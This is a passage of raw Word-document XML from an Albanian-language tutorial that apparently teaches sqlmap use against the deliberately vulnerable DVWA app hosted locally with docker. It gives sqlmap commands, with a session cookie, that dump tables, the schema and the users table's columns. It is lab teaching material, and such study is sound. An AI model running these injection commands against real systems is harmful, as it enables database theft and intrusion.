        <w:t xml:space="preserve"> PHP/MySQL që është jashtëzakonisht i cenueshëm. Qëllimet e tij kryesore janë të jetë një ndihmë për profesionistët e sigurisë për të testuar aftësitë dhe mjetet e tyre në një mjedis ligjor, të ndihmojë zhvilluesit e uebit të kuptojnë më mirë proceset e sigurimit të aplikacioneve në internet dhe të ndihmojë mësuesit/studentët për të mësuar sigurinë e aplikacioneve në internet në një mjedis klase.</w:t>
      </w:r>
      <w:r w:rsidR="003D2F28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D4310B">
        <w:t xml:space="preserve">DVWA ofron web aplikacionin në 4 nivele të sigurisë </w:t>
      </w:r>
      <w:r w:rsidR="00D4310B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D4310B">
        <w:t xml:space="preserve"> low, medium, hard dhe impossible. Përmes këtyre nivele mund të testohet se sa efikas në jetën reale është vegla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67A1EB" w14:textId="30B793FC" w:rsidR="00D4310B" w:rsidRDefault="00B42726" w:rsidP="004F1E56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ërveq aplikacionit viktim të simuluar normalisht na duhet dhde vegla sqlmap. Në sistemin operativ Kali Linux vjen e instaluar paraprakisht si pjesë e paketës së veglave të zgjedhura nga Kali Linux. Mirëpo në versione tjera të Linux mund të instalohet përmes komandës </w:t>
      </w:r>
      <w:r w:rsidRPr="00B42726">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo apt-get install sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4F986" w14:textId="72D54E63" w:rsidR="00907F1F" w:rsidRDefault="00907F1F" w:rsidP="004F1E56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2D1B74" w14:textId="50ED1660" w:rsidR="00907F1F" w:rsidRDefault="000E6107" w:rsidP="00907F1F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Përdorimi</w:t>
      </w:r>
      <w:r w:rsidR="00907F1F">
        <w:t xml:space="preserve"> i veglës</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F3CE4" w14:textId="32803A6A" w:rsidR="00907F1F" w:rsidRDefault="00907F1F" w:rsidP="00907F1F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4DD0AB" w14:textId="35450C7C" w:rsidR="000E6107" w:rsidRDefault="000E6107" w:rsidP="000E6107">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
      <w:r>
        <w:t>Fillimisht përmes veglës docker hostohet lokalisht web aplikacioni DVWA. Komanda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCC6EA" w14:textId="77777777" w:rsidR="000E6107" w:rsidRDefault="000E6107" w:rsidP="000E6107">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E285A3" w14:textId="0C3C06C4" w:rsidR="000E6107" w:rsidRDefault="000E6107" w:rsidP="000E6107">
      <w:pPr>
        <w:ind w:firstLine="220"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6107">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>docker run --rm -it -p 80:80 vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC4CF7" w14:textId="77777777" w:rsidR="000E6107" w:rsidRPr="000E6107" w:rsidRDefault="000E6107" w:rsidP="000E6107">
      <w:pPr>
        <w:ind w:firstLine="220"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4671F67D" w14:textId="556126A0" w:rsidR="00907F1F" w:rsidRDefault="000E6107" w:rsidP="000E6107">
      <w:r>
        <w:t>siguron që të hostohet lokalisht web aplikacioni DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B13A8B6" w14:textId="25DC8A5C" w:rsidR="000E6107" w:rsidRDefault="000E6107" w:rsidP="000E6107">
      <w:r>
        <w:t>Pasi të hostojmë DVWA, mund të qasemi në localhost dhe shfaqet pamja në Fig.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B4BC33" w14:textId="68A49CA8" w:rsidR="000E6107" w:rsidRDefault="000E6107" w:rsidP="000E6107"/>
    <w:p w14:paraId="26F2E1A5" w14:textId="77777777" w:rsidR="000E6107" w:rsidRDefault="000E6107" w:rsidP="000E6107">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BC8285A" wp14:editId="75B1AE77">
            <wp:extent cx="4393999" cy="28638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
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="42068"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4401738" cy="2868894"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1AD8B6" w14:textId="363B4481" w:rsidR="000E6107" w:rsidRDefault="000E6107" w:rsidP="000E6107">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc91427371"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Aplikacioni DVWA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="4D5F9238" w14:textId="11867460" w:rsidR="000E6107" w:rsidRDefault="00B01FF3" w:rsidP="000E6107">
      <w:r>
        <w:t>Në aplikacionin DVWA mund të kyçemi përmes kredecialeve të paracaktuara admin/password. Pas kyçjes na shfaqet njç përshkrim i shkurt i aplikacionit dhe mundësia për të krijuar databazën e aplikacionit ose për të e resetuar atë , kjo shihet në figurën 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2B3541" w14:textId="0AA6E92A" w:rsidR="00B01FF3" w:rsidRDefault="00B01FF3" w:rsidP="000E6107"/>
    <w:p w14:paraId="4F368999" w14:textId="77777777" w:rsidR="00B01FF3" w:rsidRDefault="00B01FF3" w:rsidP="00B01FF3">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68D5ED17" wp14:editId="3958611C">
            <wp:extent cx="3992880" cy="4492196"/>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99148" cy="4499247"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="404BAF1F" w14:textId="7256AF32" w:rsidR="00B01FF3" w:rsidRDefault="00B01FF3" w:rsidP="00B01FF3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc91427372"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Krijimi i databazës testuese në mënyrë automatike</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="4350287B" w14:textId="15676724" w:rsidR="00B01FF3" w:rsidRDefault="00B01FF3" w:rsidP="00B01FF3"/>
    <w:p w14:paraId="3AEC8235" w14:textId="0B1439C0" w:rsidR="00FC1B2E" w:rsidRDefault="00FC1B2E" w:rsidP="00B01FF3">
      <w:r>
        <w:t>Në figurën 3 në pjesën e majtë mund të shihen kategori të ndryshëm për të cilat aplikacioni DVWA përgatit mjedisin për testimin e tyre. Për rastin tonë duke marrë parasysh veglën të cilën e kemi në diskutim, na shërbejnë SQL Injection dhe Blind SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F84262" w14:textId="0D3EE798" w:rsidR="00FC1B2E" w:rsidRDefault="00FC1B2E" w:rsidP="00B01FF3"/>
    <w:p w14:paraId="414766AB" w14:textId="258C7C2B" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198447CE" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B2F5C53" w14:textId="77777777" w:rsidR="00FC1B2E" w:rsidRDefault="00FC1B2E" w:rsidP="00FC1B2E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF1A688" wp14:editId="1B5DA3ED">
            <wp:extent cx="3995928" cy="4498848"/>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95928" cy="4498848"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B14EF00" w14:textId="2AC016C3" w:rsidR="00FC1B2E" w:rsidRPr="00B01FF3" w:rsidRDefault="00FC1B2E" w:rsidP="00FC1B2E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc91427373"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mjedisi i cili është i cenushëm ndaj sql injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="4871A1B6" w14:textId="56854FE1" w:rsidR="000E6107" w:rsidRDefault="000E6107" w:rsidP="000E6107"/>
    <w:p w14:paraId="53564853" w14:textId="7BFBCCAD" w:rsidR="00FC1B2E" w:rsidRDefault="00FC1B2E" w:rsidP="000E6107"/>
    <w:p w14:paraId="05E7F4F9" w14:textId="6E3100B7" w:rsidR="0059593B" w:rsidRDefault="0059593B" w:rsidP="000E6107">
      <w:r>
        <w:t>Për të e lehtësuar punën tonë do të përdorim Developer Tools. Në figurën 4 shihet se në sektorin Network në kuadër të Developer Tools shohim kërkesën tonë (request) në momentin që bëjm</w:t>
      </w:r>
      <w:r w:rsidR="001E20FD">
        <w:t xml:space="preserve">ë </w:t>
      </w:r>
      <w:r>
        <w:t>submit formën. Në Network mund të shohim se kërkesa e bërë submit është e llojit GET</w:t>
      </w:r>
      <w:r w:rsidR="001E20FD">
        <w:t>, dhe gjithashtu shohim se Cookies që janë bërë submit bashk me kërkesën tonë është edhe PHPSESSID e cila përdoret për authentikim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F55142" w14:textId="263B36A8" w:rsidR="001E20FD" w:rsidRDefault="001E20FD" w:rsidP="000E6107"/>
    <w:p w14:paraId="7EB38FCA" w14:textId="77777777" w:rsidR="001E20FD" w:rsidRDefault="001E20FD" w:rsidP="001E20FD">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16C146A2" wp14:editId="01BB6F71">
            <wp:extent cx="3995928" cy="4498848"/>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95928" cy="4498848"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC912A" w14:textId="45F4C165" w:rsidR="001E20FD" w:rsidRDefault="001E20FD" w:rsidP="001E20FD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc91427374"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Përcjellja e requestit përmes Developer Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="791ABA46" w14:textId="506EBA4A" w:rsidR="001E20FD" w:rsidRDefault="001E20FD" w:rsidP="001E20FD">
      <w:r>
        <w:t>Duke marrë parasysh të gjitha informatat e mledhura nga analiza e pjesës së aplikacionit të cilin dëshirojmë të e sulmojmë, formojmë komandën e sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ED9322" w14:textId="2F32488F" w:rsidR="001E20FD" w:rsidRDefault="001E20FD" w:rsidP="001E20FD"/>
    <w:p w14:paraId="37165B2F" w14:textId="1197719F" w:rsidR="001E20FD" w:rsidRDefault="001E20FD" w:rsidP="001E20FD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E20FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "127.0.0.1/vulnerabilities/sqli/?id=&amp;Submit=Submit" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=low" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001E20FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49A2FA" w14:textId="79EEA41E" w:rsidR="001E20FD" w:rsidRDefault="001E20FD" w:rsidP="001E20FD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531B1E6A" w14:textId="55168EF0" w:rsidR="001E20FD" w:rsidRDefault="001E20FD" w:rsidP="001E20FD">
      <w:r>
        <w:t xml:space="preserve">Në parametrin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">caktojmë targetin tonë të cilin dëshirojmë të e sulmojmë , meqenëse kërkesa është e llojit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">caktojmë në URL edhe parametrat e kërkesës. Parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–cookies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> , përmban cookiet të cilat duam të i bëjmë submit bashk me kërkesë</w:t>
      </w:r>
      <w:r w:rsidR="00CD1209">
        <w:t xml:space="preserve">, në rastin tonë dërgojmë </w:t>
      </w:r>
      <w:r w:rsidR="00CD1209">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHPSESSID p</w:t>
      </w:r>
      <w:r w:rsidR="00CD1209">
        <w:t xml:space="preserve">ër të u authentikuar. Parametri </w:t>
      </w:r>
      <w:r w:rsidR="00CD1209">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-tables </w:t>
      </w:r>
      <w:r w:rsidR="00CD1209">
        <w:t>shërben për të printuar të gjitha tabelat nga databaza pas injektimit. Në figurën 5 mund të shihen rezulatatet e kësaj komande.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D76659A" w14:textId="2224ABAD" w:rsidR="00CD1209" w:rsidRDefault="00CD1209" w:rsidP="001E20FD"/>
    <w:p w14:paraId="67DCD51A" w14:textId="77777777" w:rsidR="00CD1209" w:rsidRDefault="00CD1209" w:rsidP="00CD1209">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D06322" wp14:editId="3848B055">
            <wp:extent cx="3995928" cy="4471416"/>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5928" cy="4471416"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DAC072" w14:textId="70DC0292" w:rsidR="00CD1209" w:rsidRDefault="00CD1209" w:rsidP="00CD1209">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc91427375"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Printimi i tabelave të databazave pas injektimit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="20CA71E0" w14:textId="117F5C7E" w:rsidR="00CD1209" w:rsidRDefault="00CD1209" w:rsidP="00CD1209"/>
    <w:p w14:paraId="5E0C1780" w14:textId="605D4303" w:rsidR="00CD1209" w:rsidRDefault="00CD1209" w:rsidP="00CD1209">
      <w:r>
        <w:t>Në vazhdimësi do të eksplorojmë komanda të ndryshme të sqlmap duket i sqaruar gjithmonë vetëm ata parametra që shfaqen për herë të parë.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E699F" w14:textId="2BA0CEB5" w:rsidR="00CD1209" w:rsidRDefault="00CD1209" w:rsidP="00CD1209">
      <w:r>
        <w:t>Në rast se pas injektimit dëshirojmë të printojmë skemën e databazës atëherë përdorim komandën në vijim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5326BBA9" w14:textId="0FFA2E4B" w:rsidR="00CD1209" w:rsidRDefault="00CD1209" w:rsidP="00CD1209"/>
    <w:p w14:paraId="4DD43720" w14:textId="0967B09E" w:rsidR="005E0FB6" w:rsidRDefault="005E0FB6" w:rsidP="005E0FB6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E0FB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "127.0.0.1/vulnerabilities/sqli/?id=&amp;Submit=Submit" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=low" --schema </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0FB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EF64F4" w14:textId="1258B8D5" w:rsidR="005E0FB6" w:rsidRDefault="005E0FB6" w:rsidP="005E0FB6"/>
    <w:p w14:paraId="10C9EBCA" w14:textId="158A7D67" w:rsidR="005E0FB6" w:rsidRDefault="005E0FB6" w:rsidP="005E0FB6">
      <w:r>
        <w:t xml:space="preserve">Parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–schema </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">shërben për të printuar të gjithë skemën e databazës, kurse parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–batch </w:t>
      </w:r>
      <w:r>
        <w:t>shërben për të përdorur të gjitha opsionet e sygjeruara dhe të mos pyetet useri për vendime gjatë ekzekutimit të komandat. Rezulatet e komadës mund të shihen në figurën 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0A1366" w14:textId="77777777" w:rsidR="005E0FB6" w:rsidRDefault="005E0FB6" w:rsidP="005E0FB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DE5C49B" wp14:editId="232193D2">
            <wp:extent cx="3995928" cy="4471416"/>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95928" cy="4471416"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF98812" w14:textId="7186BF7F" w:rsidR="005E0FB6" w:rsidRDefault="005E0FB6" w:rsidP="005E0FB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc91427376"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Printimi i skemës së databazës</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1C0B737E" w14:textId="5D319F18" w:rsidR="005E0FB6" w:rsidRDefault="005E0FB6" w:rsidP="005E0FB6">
      <w:r>
        <w:t xml:space="preserve">Si shihet në figurën 6, serveri i cili jemi duke sulmuar përmban </w:t>
      </w:r>
      <w:r w:rsidR="00E44FDA">
        <w:t xml:space="preserve">dy databaza, </w:t>
      </w:r>
      <w:r w:rsidR="00E44FDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dvwa </w:t>
      </w:r>
      <w:r w:rsidR="00E44FDA">
        <w:t xml:space="preserve">dhe </w:t>
      </w:r>
      <w:r w:rsidR="00E44FDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema, </w:t>
      </w:r>
      <w:r w:rsidR="00E44FDA">
        <w:t xml:space="preserve">ne na intereson vetëm dvwa. Për këtë arsye e targetojmë një databazë dhe gjegjsisht një tabelë specifike. Në rastin tonë tabelën </w:t>
      </w:r>
      <w:r w:rsidR="00E44FDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="00E44FDA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B14358" w14:textId="527168D3" w:rsidR="00E44FDA" w:rsidRDefault="00E44FDA" w:rsidP="005E0FB6"/>
    <w:p w14:paraId="63CF4908" w14:textId="18F8F89F" w:rsidR="00E44FDA" w:rsidRDefault="00E44FDA" w:rsidP="00E44FDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44FDA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "127.0.0.1/vulnerabilities/sqli/?id=&amp;Submit=Submit" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=low" --columns -T users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
